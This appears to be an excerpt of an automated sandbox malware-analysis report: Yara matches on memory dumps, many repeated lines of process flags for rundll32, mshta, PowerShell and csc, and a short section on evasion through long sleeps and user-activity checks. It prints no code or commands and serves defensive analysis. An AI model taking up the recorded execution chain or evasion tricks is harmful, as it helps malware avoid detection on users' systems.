Source: Yara match File source: 00000004.00000003.397475800.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451696004.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397396701.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434150338.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.543947285.000000000F1EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434024374.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.377109820.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433927552.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374368880.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397343718.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397511011.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374359544.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374253980.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5780, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2224, type: MEMORYSTR
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3619 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5092 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5210
